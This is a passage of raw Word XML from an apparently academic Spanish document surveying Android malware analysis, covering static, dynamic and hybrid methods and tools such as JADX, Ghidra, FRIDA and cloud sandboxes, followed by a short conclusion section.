        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00270F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Análisis de malware en Android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C443D0" w14:textId="77777777" w:rsidR="00774CD1" w:rsidRDefault="00774CD1" w:rsidP="00AA7068">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B036C8B" w14:textId="4B46ED04" w:rsidR="00B93429" w:rsidRDefault="00B93429" w:rsidP="00B7126E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pese a que en sus inicios el malware para sistemas móviles era rudimentario en comparación con el existente en los sistemas informáticos más maduros como los ordenadores, con el tiempo los primeros han ido aumentando su nivel de sofisticación</w:t>
      </w:r>
      <w:r w:rsidR="00441BC4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2670F9AB" w14:textId="25AFE0C4" w:rsidR="00B93429" w:rsidRPr="009B079A" w:rsidRDefault="00B93429" w:rsidP="00B7126E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">En muchos de los casos, el análisis de malware para los sistemas móviles, y particularmente Android al ser la plataforma más popular, está basado en métodos y técnicas similares provenientes del análisis de malware tradicional, al ser estrategias que han demostrado ser útiles en la identificación y prevención de software dañino. </w:t>
      </w:r>
      <w:r w:rsidR="00A05216">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En ambas plataformas,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> las principales técnicas </w:t>
      </w:r>
      <w:r w:rsidR="00A05216">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>son</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el análisis estático y el análisis dinámico. En primer </w:t>
      </w:r>
      <w:r w:rsidR="000624E1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lugar,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> hablaremos del análisis estático </w:t>
      </w:r>
      <w:r w:rsidR="008B6AD0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>aplicado a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Android.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7613FECA" w14:textId="7ABAEFB9" w:rsidR="00E95A92" w:rsidRDefault="000624E1" w:rsidP="00B7126E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Pese a utilizar técnicas similares al análisis tradicional de malware, para el análisis estático en Android las herramientas comunes para plataformas como Windows o Linux, como pueden ser </w:t>
      </w:r>
      <w:r w:rsidR="00B148ED">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">los </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>analizadores de cabeceras</w:t>
      </w:r>
      <w:r w:rsidR="00B148ED">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o ficheros</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, no son </w:t>
      </w:r>
      <w:r w:rsidR="00A5173B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">normalmente </w:t>
      </w:r>
      <w:r w:rsidR="008B6AD0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidR="00DA328B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">gran </w:t>
      </w:r>
      <w:r w:rsidR="008B6AD0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>utilidad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Además, el código fuente del malware rara vez se encuentra disponible, teniendo que ser analizado en su lugar el bytecode que se encuentra dentro de los ficheros APK de las aplicaciones maliciosas</w:t>
      </w:r>
      <w:r w:rsidR="00066F69">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y que en algunos casos también contará con medidas de protección similares a las encontradas en sistemas como Windows, como pueden ser el packing [X] de aplicaciones para la ocultación de sus clases </w:t>
      </w:r>
      <w:r w:rsidR="00D17309">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">reales </w:t>
      </w:r>
      <w:r w:rsidR="00066F69">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y su posterior carga dinámica [X] para evadir la detección </w:t>
      </w:r>
      <w:r w:rsidR="00D17309">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">estática </w:t>
      </w:r>
      <w:r w:rsidR="00066F69">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de manera sencilla</w:t>
      </w:r>
      <w:r w:rsidR="00282F9A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, o la ofuscación del propio código para hacerlo más difícil de comprender en el futuro por parte de posibles analistas</w:t>
      </w:r>
      <w:r w:rsidR="008A35C6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r w:rsidR="00282F9A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D17309">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para lidiar con estos casos, se cuenta con una variedad de</w:t>
      </w:r>
      <w:r w:rsidR="00282F9A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> herramientas específicas para </w:t>
      </w:r>
      <w:r w:rsidR="00D17309">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para </w:t>
      </w:r>
      <w:r w:rsidR="00282F9A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Android, como pueden ser simplify [X] para tratar de revertir </w:t>
      </w:r>
      <w:r w:rsidR="00300F45">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">algunos de los </w:t>
      </w:r>
      <w:r w:rsidR="00282F9A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">métodos de ofuscación </w:t>
      </w:r>
      <w:r w:rsidR="00A1107B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">más </w:t>
      </w:r>
      <w:r w:rsidR="00282F9A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>comunes</w:t>
      </w:r>
      <w:r w:rsidR="00300F45">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A324F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y populares, </w:t>
      </w:r>
      <w:r w:rsidR="00A1107B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">como pueden ser los aplicados por el programa ProGuard </w:t>
      </w:r>
      <w:r w:rsidR="002A324F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[X]</w:t>
      </w:r>
      <w:r w:rsidR="00D17309">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007620D7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o el unpacker HoseDex2Jar [X].</w:t>
      </w:r>
      <w:r w:rsidR="00866008">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Una vez obtenido el fichero DEX definitivo que declara las clases que utilizará la aplicación, se puede tratar de obtener código Java a partir de él</w:t>
      </w:r>
      <w:r w:rsidR="003564C1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, haciendo uso de</w:t>
      </w:r>
      <w:r w:rsidR="00866008">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> herramientas populares como JADX [X]</w:t>
      </w:r>
      <w:r w:rsidR="003564C1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778BB898" w14:textId="0B6DE273" w:rsidR="0002169F" w:rsidRDefault="00F17032" w:rsidP="00B7126E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No obstante, en el caso de ser superada la fase de medidas de anti-análisis comentadas, y estando en posesión de bien código Java o tratarse de un caso de malware que utiliza librerías nativas compiladas a partir de código C o C++, algunas herramientas que forman parte del arsenal de análisis estático estándar</w:t>
      </w:r>
      <w:r w:rsidR="00291D56">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>son de gran utilidad, como puede ser Ghidra [X]</w:t>
      </w:r>
      <w:r w:rsidR="0002169F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, además de técnicas establecidas en el análisis tradicional como el análisis de dependencias mediante grafos</w:t>
      </w:r>
      <w:r w:rsidR="00291D56">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6121BC55" w14:textId="41D4DC09" w:rsidR="004D5EA3" w:rsidRDefault="004D5EA3" w:rsidP="00B7126E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En lo relativo al análisis dinámi</w:t>
      </w:r>
      <w:r w:rsidR="002D395B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>co</w:t>
      </w:r>
      <w:r w:rsidR="00102BBD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, Android cuenta con menos opciones para la virtualización de dispositivos que las disponibles para plataformas más establecidas en el mundo del malware como son Windows o Linux. Se distinguen dos tipos de análisis en este caso, </w:t>
      </w:r>
      <w:r w:rsidR="00D83DF0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">conocidos como in-the-box y out-the-box. El primero de ellos hace referencia al análisis en el que se ejecuta la muestra maliciosa y el análisis junto con la recogida de información se </w:t>
      </w:r>
      <w:r w:rsidR="00D83DF0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>produce en el mismo nivel y en el mismo dispositivo. Para llevar a cabo este método se necesita de utilidades que trabajen en el mismo nivel que la máquina virtual Dalvik</w:t>
      </w:r>
      <w:r w:rsidR="00E43B5B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y tratan de instrumentar procesos internos de Android para obtener información acerca de las modificaciones realizadas por el malware</w:t>
      </w:r>
      <w:r w:rsidR="00D83DF0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, como por ejemplo </w:t>
      </w:r>
      <w:r w:rsidR="00E43B5B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">es el caso de </w:t>
      </w:r>
      <w:r w:rsidR="00D83DF0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>la herramienta DIVILAR [X]. Un punto en contra de este tipo de métodos que trabajan en un nivel de abstracción</w:t>
      </w:r>
      <w:r w:rsidR="00E43B5B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00544BB1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>igual que el propio malware</w:t>
      </w:r>
      <w:r w:rsidR="00E43B5B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00544BB1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es que este último puede realizar comprobaciones para tratar de detectar si el entorno está siendo alterado con fines analíticos y modificar su comportamiento para tratar de pasar desapercibido, o </w:t>
      </w:r>
      <w:r w:rsidR="00E43B5B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">simplemente </w:t>
      </w:r>
      <w:r w:rsidR="00544BB1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dejar de funcionar [X]</w:t>
      </w:r>
      <w:r w:rsidR="009113B5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C598DF4" w14:textId="757B3E82" w:rsidR="009113B5" w:rsidRDefault="009113B5" w:rsidP="00B7126E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El segundo método, out-the-box, también conocido como análisis de tipo VM, se trata del uso de emuladores y entornos virtuales aislados (también denominados sandbox)</w:t>
      </w:r>
      <w:r w:rsidR="00D34812">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> como pueden ser el propio emulador de la suite Android Studio de Google o herramientas de terceros como GenyMotion [X] o Android-x86 [X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, realizando el análisis desde un entorno externo</w:t>
      </w:r>
      <w:r w:rsidR="00D34812">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la misma máquina</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Pese a que las diferencias entre la emulación y un entorno real son casi imperceptibles, incluyendo la simulación de elementos como </w:t>
      </w:r>
      <w:r w:rsidR="00E43B5B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el sensor GPS, la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> cámara, </w:t>
      </w:r>
      <w:r w:rsidR="00E43B5B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o el lector de huellas dactilares entre otros, existen diferencias y nuevamente el malware puede detectar que está siendo ejecutado en un entorno modificado, respondiendo adecuadamente para tratar de evitar el análisis.</w:t>
      </w:r>
      <w:r w:rsidR="004B6F86">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pese a que este segundo método no trabaja en un nivel tan cercano al propio malware, permite la utilización de multitud de herramientas para tratar de instrumentar la ejecución de este, como pueden ser FRIDA [X], herramientas derivadas como objection [X]</w:t>
      </w:r>
      <w:r w:rsidR="00E50E9C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o medusa [X], además de utilidades como Wireshark para la captura de tráfico o la suite de Burp para realizar operaciones de proxy como el Certificate Pinning [X].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D4BF26" w14:textId="52892270" w:rsidR="00027444" w:rsidRDefault="00466E01" w:rsidP="00B7126E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Es importante mencionar que las herramientas de análisis dinámico enumeradas </w:t>
      </w:r>
      <w:r w:rsidR="00855959">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">hasta el momento </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">son todas ellas aplicables a entornos locales, y se ha de tener en cuenta que hay también un ecosistema </w:t>
      </w:r>
      <w:r w:rsidR="00EE4826">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de ofertas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">en la nube como por ejemplo JoeSandbox [X], que permiten la asignación de espacios </w:t>
      </w:r>
      <w:r w:rsidR="00EE4826">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>aislados</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en los que ejecutar aplicaciones Android potencialmente maliciosas y recabar información acerca de su comportamiento</w:t>
      </w:r>
      <w:r w:rsidR="00D161F3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, que pese a no ofrecer el control ni la granularidad de análisis que se pueden obtener co</w:t>
      </w:r>
      <w:r w:rsidR="00EE4826">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">n métodos </w:t>
      </w:r>
      <w:r w:rsidR="00D161F3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>local</w:t>
      </w:r>
      <w:r w:rsidR="00EE4826">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00D161F3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, pueden ser una solución adecuada para un análisis de menor profundidad pero que </w:t>
      </w:r>
      <w:r w:rsidR="00E35F0F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>proporcione</w:t>
      </w:r>
      <w:r w:rsidR="00D161F3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> datos importantes sobre el malware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. No obstante, en este espacio de soluciones </w:t>
      </w:r>
      <w:r w:rsidR="00EE4826">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">online </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el ecosistema Android carece del número de plataformas dedicadas a otros sistemas como Windows o Linux. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A7175" w14:textId="53C51F35" w:rsidR="00356307" w:rsidRDefault="00EE4826" w:rsidP="00B7126E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Por último, a</w:t>
      </w:r>
      <w:r w:rsidR="000543D2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">demás de los dos métodos principales de análisis, también se puede considerar un tercero conocido como análisis híbrido, que aúna el análisis estático y el dinámico, ejecutándolos de manera </w:t>
      </w:r>
      <w:r w:rsidR="00C63768">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cercana al paralelismo</w:t>
      </w:r>
      <w:r w:rsidR="000543D2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para tratar de explorar todos los caminos de ejecución que puede ofrecer una aplicación</w:t>
      </w:r>
      <w:r w:rsidR="009D5B59">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y tratar de maximizar el área </w:t>
      </w:r>
      <w:r w:rsidR="004F124F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">del código del malware </w:t>
      </w:r>
      <w:r w:rsidR="009D5B59">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cubierta por el análisis. Herramientas como el módulo A5 [X]</w:t>
      </w:r>
      <w:r w:rsidR="006B03EA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o el algoritmo de tipo concólico (que aúna análisis concreto y simbólico) ALLSEQS [X]</w:t>
      </w:r>
      <w:r w:rsidR="001E2292">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> son algunos ejemplos de este tipo de técnicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A08EC4D" w14:textId="77777777" w:rsidR="007620D7" w:rsidRDefault="007620D7" w:rsidP="00AA7068">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78227075" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="003D3AF2" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C413A0E" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1060"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5D072C"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16" w:name="_Toc107862679"/>
      <w:bookmarkStart w:id="17" w:name="_Toc170500149"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1.2.5   Conclusión</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="589AEF48" w14:textId="77777777" w:rsidR="00E55634" w:rsidRPr="00E55634" w:rsidRDefault="00E55634" w:rsidP="00E55634">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED91440" w14:textId="77777777" w:rsidR="00807221" w:rsidRDefault="00E56F7F" w:rsidP="00E56F7F">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Como se ha expuesto en la sección anterior, el estado actual tanto del malware en Android</w:t>
      </w:r>
      <w:r w:rsidR="00E55634">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, específicamente de las aplicaciones de tipo troyano,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> como </w:t>
      </w:r>
      <w:r w:rsidR="00E55634">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">también </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de las herramientas y técnicas que existen para su análisis son ampliamente variadas</w:t>
      </w:r>
      <w:r w:rsidR="00E55634">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A7EC5B" w14:textId="2454A8B6" w:rsidR="00E56F7F" w:rsidRDefault="00E56F7F" w:rsidP="00E56F7F">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Pese a que el entorno móvil no cuenta </w:t>
      </w:r>
      <w:r w:rsidR="00E55634">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">todavía </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con el mismo abanico de posibilidades </w:t>
      </w:r>
      <w:r w:rsidR="00E55634">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y recursos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">que los entornos mayoritarios de escritorio como Windows o Linux, tanto la sofisticación del malware como los procedimientos </w:t>
      </w:r>
      <w:r w:rsidR="00E55634">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>para su detección se encuentran en el centro de una carrera constante de innovación entre atacantes y analistas del lado de la defensa</w:t>
      </w:r>
      <w:r w:rsidR="00807221">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que hace que el análisis de malware en Android sea un tema de actualidad y gran importancia dentro del mundo de la ciberseguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5A6746" w14:textId="77777777" w:rsidR="00AA503C" w:rsidRDefault="00AA503C" w:rsidP="00E56F7F">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A93CCAC"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18" w:name="_Toc107862680"/>
      <w:bookmarkStart w:id="19" w:name="_Toc170500150"/>
      <w:r>
        <w:rPr>
